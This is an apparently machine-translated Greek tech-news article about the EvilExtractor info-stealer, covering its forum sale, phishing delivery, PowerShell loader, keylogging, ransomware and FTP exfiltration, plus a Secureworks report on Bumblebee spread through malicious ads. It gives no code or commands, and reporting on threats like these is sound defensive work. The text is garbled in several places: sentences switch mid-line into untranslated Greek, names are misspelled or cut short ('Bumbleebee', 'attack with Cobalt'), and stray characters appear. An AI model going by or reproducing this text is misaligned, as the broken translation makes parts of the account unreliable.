EvilExtractor: A thief for Windows systems appears on the Dark Web

A new data-stealing malware called EvilExtractor is available for sale and targets files from Windows systems.

evilextractor

"It includes several modules that all work through an FTP service," said Cara Lin, a researcher at Fortinet FortiGuard Labs. “It also contains functions περιβάλλοντος και Anti-VM. Ο κύριος σκοπός του φαίνεται να είναι να κλέβει δεδομένα και πληροφορίες του προγράμματος περιήγησης από εκτεθειμένα τελικά and then uploading them to the attacker's FTP server”.

The network security firm said it noticed a wave of attacks spreading the malware in March 2023, with the majority of victims located in Europe and the US. While EvilExtractor is marketed as an educational tool, it has been adopted by hackers as an information stealer.

The tool ς πωλείται από έναν hacker με το όνομα Kodex σε φόρουμ κυβερνοεγκλήματος όπως το Cracked που χρονολογείται από τις 22 Οκτωβρίου 2022. Ενημερώνεται συνεχώς και ενσωματώνει διάφορες ενότητες για να αποσπάσει μεταδεδομένα συστήματος, κωδικούς πρόσβασης και cookies από διάφορα προγράμματα περιήγησης στο διαδίκτυο, καθώς και να καταγράφει πληκτρολογήσεις και να ενεργεί ακόμη και ως ransomware κρυπτογραφώντας αρχεία στο σύστημα-στόχο.

The malware is also said to have been used as part of a phishing email campaign detected by the company on March 30, 2023. The emails trick recipients into launching an executable file disguised as a PDF document under the guise of confirming its “details their account".

The “Account_Info.exe” binary is a cloaked Python program designed to launch a .NET loader that uses a Base64-encoded PowerShell script to launch EvilExtractor. The malware, in addition to collecting files, can also activate the camera and capture screenshots.

“EvilExtractor is used as a complete information stealer with multiple malware , including ransomware,” said Lin. “The PowerShell script can escape detection in a .NET or PyArmor loader. Within a very short period of time, its developer has updated several functions and increased its stability."

The findings come as Secureworks' Counter Threat Unit (CTU) details a malicious SEO campaign used to deliver the Bumblebee malware loader via rogue installers of legitimate software.

evil

Bumbleebee, first reported a year ago by Google's Threat Analysis Group and Proofpoint, is a modular loader that spreads primarily through phishing techniques. It is suspected to have been developed by actors associated with the Conti ransomware operation as a replacement for BazarLoader.

The use of malicious ads to redirect users looking for popular tools such as ChatGPT, Cisco AnyConnect, Citrix Workspace and Zoom to fake websites that host infected installation files has been on the rise in recent months, after Microsoft began blocking macros by default from Office files downloaded from the web.

In one incident described by the cybersecurity firm, the attacker used the Bumblebee malware to gain an entry point and move laterally after three hours to attack with Cobalt and a legitimate remote access software like AnyDesk and Dameware. The attack was eventually stopped before it progressed to the final ransomware stage.

 

iGuRu.gr The Best Technology Site in Greecefgns

every publication, directly to your inbox

Join the 2.100 registrants.
EvilExtractor, Dark Web

Written by Anastasis Vasileiadis

Translations are like women. When they are beautiful they are not faithful and when they are faithful they are not beautiful.

Leave a reply

Your email address is not published. Required fields are mentioned with *

Your message will not be published if:
1. Contains insulting, defamatory, racist, offensive or inappropriate comments.
2. Causes harm to minors.
3. It interferes with the privacy and individual and social rights of other users.
4. Advertises products or services or websites.
5. Contains personal information (address, phone, etc.).